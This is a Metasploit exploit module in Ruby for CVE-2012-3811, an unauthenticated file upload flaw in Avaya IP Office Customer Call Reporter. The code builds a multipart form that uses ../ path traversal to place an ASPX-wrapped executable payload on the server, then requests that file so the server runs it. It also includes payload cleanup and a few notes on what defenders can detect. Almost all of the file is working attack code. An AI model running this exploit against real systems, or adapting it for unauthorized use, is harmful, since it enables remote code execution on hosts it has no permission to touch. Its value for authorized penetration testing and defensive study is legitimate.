rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
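# Metasploit module for CVE-2012-3811: the ImageUpload.ashx handler of Avaya IP
# Office Customer Call Reporter accepts file uploads without authentication.
#
# Flow implemented below:
#   1. POST a multipart form to CCRWebClient/Wallboard/ImageUpload.ashx; the
#      RadUAG_targetFolder field is set to ../../CCRWallboardMessageBroker/.
#   2. Read the stored file path and the public URL from the response body.
#   3. GET the uploaded .aspx so the server runs it.
#   4. On a Meterpreter session, delete the uploaded file again.
#
# For defenders reviewing a host or its web logs: the traffic is a POST to
# ImageUpload.ashx sent without credentials, followed by a GET for the file it
# created; the artifact is an .aspx file named with 3 to 7 random letters. The
# vendor advisory is listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Registers the module metadata and the TARGETURI option, and marks the
  # module as needing cleanup because it leaves a file on the target.
  def initialize
    super(
      'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability on Avaya IP Office
        Customer Call Reporter, which allows a remote user to upload arbitrary files
        through the ImageUpload.ashx component. It can be abused to upload and execute
        arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP
        Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.
      },
      'Author' => [
        'rgod <rgod[at]autistici.org>', # Vulnerability discovery
        'juan vazquez' # Metasploit module
      ],
      'Platform' => 'win',
      'References' => [
        [ 'CVE', '2012-3811' ],
        [ 'OSVDB', '83399' ],
        [ 'BID', '54225' ],
        [ 'URL', 'https://downloads.avaya.com/css/P8/documents/100164021' ],
        [ 'ZDI', '12-106' ]
      ],
      'Targets' => [
        [ 'Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2', {} ],
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'DisclosureDate' => 'Jun 28 2012'
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Avaya CCR applications', '/'])
      ]
    )

    self.needs_cleanup = true
  end

  #
  # Remove the uploaded .aspx if we get a meterpreter.
  #
  # cli is the new session. Any other session type cannot use the file API
  # called here, so the operator is told to remove the file by hand.
  #
  def on_new_session(cli)
    if cli.type != 'meterpreter'
      print_error("Meterpreter not used. Please manually remove #{@payload_path}")
      return
    end

    # exploit leaves @payload_path empty when the server response did not
    # contain the stored path; there is nothing this method can delete then.
    if @payload_path.to_s.empty?
      print_error('The payload file path is unknown. Please locate and remove the uploaded .aspx manually')
      return
    end

    cli.core.use("stdapi") unless cli.ext.aliases.include?("stdapi")

    begin
      print_warning("Removing #{@payload_path}")
      cli.fs.file.rm(@payload_path)
      print_good("#{@payload_path} deleted")
    rescue ::Exception => e
      # Broad rescue kept from the original so that a failed cleanup is
      # reported instead of propagating out of the session callback.
      # NOTE(review): narrowing it needs a check of which exception classes
      # the Meterpreter file API raises.
      print_error("Unable to delete #{@payload_path}: #{e.message}")
    end
  end

  # Uploads the ASPX-wrapped payload, extracts where the server stored it, and
  # requests it once. Returns early, after printing an error, when any step
  # fails.
  def exploit
    # Reset per-run state so on_new_session never sees a stale path.
    @payload_path = ''

    # Generate the ASPX containing the EXE containing the payload
    exe = generate_payload_exe
    aspx = Msf::Util::EXE.to_exe_aspx(exe)
    aspx_b64 = Rex::Text.encode_base64(aspx)

    boundary = "---------------------------#{rand_text_alpha(36)}"
    my_data = ccr_upload_form(boundary, aspx_b64)

    #
    # UPLOAD
    #
    # The original called `.path` on the String returned by target_uri.path,
    # which raises NoMethodError whenever TARGETURI lacks a trailing slash;
    # normalize_uri joins the segments for both forms.
    attack_url = normalize_uri(target_uri.path, 'CCRWebClient', 'Wallboard', 'ImageUpload.ashx')
    print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...")

    res = send_request_cgi({
      'uri' => attack_url,
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => my_data,
    }, 20)

    unless res && res.code == 200 && res.body =~ /"Key":"RadUAG_success","Value":true/
      print_error("Payload upload failed")
      return
    end
    print_good("Payload uploaded successfully")

    # Retrieve info about the uploaded payload

    if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
      @payload_path = Regexp.last_match(1)
      print_status("Payload stored on #{@payload_path}")
    else
      # Not fatal for the run, but on_new_session will be unable to clean up.
      print_error("The payload file path couldn't be retrieved")
    end

    unless res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
      print_error("The payload URI couldn't be retrieved... Aborting!")
      warn_leftover_payload
      return
    end

    begin
      payload_url = URI(Regexp.last_match(1)).path
    rescue URI::InvalidURIError => e
      # The value comes from the server response; a malformed one should end
      # the run with a message rather than an unhandled exception.
      print_error("The payload URI couldn't be parsed: #{e.message}")
      warn_leftover_payload
      return
    end

    #
    # EXECUTE
    #
    print_status("Executing #{payload_url}...")

    res = send_request_cgi({
      'uri' => payload_url,
      'method' => 'GET'
    }, 20)

    unless res && res.code == 200
      print_error("Execution failed on #{payload_url} [No Response]")
    end
  end

  private

  # Builds the multipart/form-data body for the upload request.
  #
  # boundary is the multipart boundary without the leading "--"; aspx_b64 is
  # the Base64 text placed in the RadUAG_data field. Field names, order and
  # fixed values are exactly those the original inline code sent.
  def ccr_upload_form(boundary, aspx_b64)
    fields = [
      ['RadUAG_fileName', "#{rand_text_alpha(rand(5) + 3)}.aspx"],
      ['RadUAG_data', aspx_b64],
      # Relative path with ../ segments: the value that moves the file out of
      # the handler's default folder.
      ['RadUAG_targetFolder', '../../CCRWallboardMessageBroker/'],
      ['RadUAG_position', '0'],
      ['RadUAG_targetPhysicalFolder', ''],
      ['RadUAG_overwriteExistingFiles', 'True'],
      ['RadUAG_finalFileRequest', 'True'],
      ['UploadImageType', '0'],
      ['WallboardID', '0']
    ]

    form = String.new
    fields.each do |name, value|
      form << "--#{boundary}\r\n"
      form << "Content-Disposition: form-data; name=\"#{name}\"\r\n"
      form << "\r\n"
      form << "#{value}\r\n"
    end
    form << "--#{boundary}--\r\n"
  end

  # Tells the operator that an uploaded file stays on the target when the run
  # stops before the payload is requested, since no session will clean it up.
  def warn_leftover_payload
    return if @payload_path.to_s.empty?

    print_warning("The uploaded file was not executed. Please manually remove #{@payload_path}")
  end
end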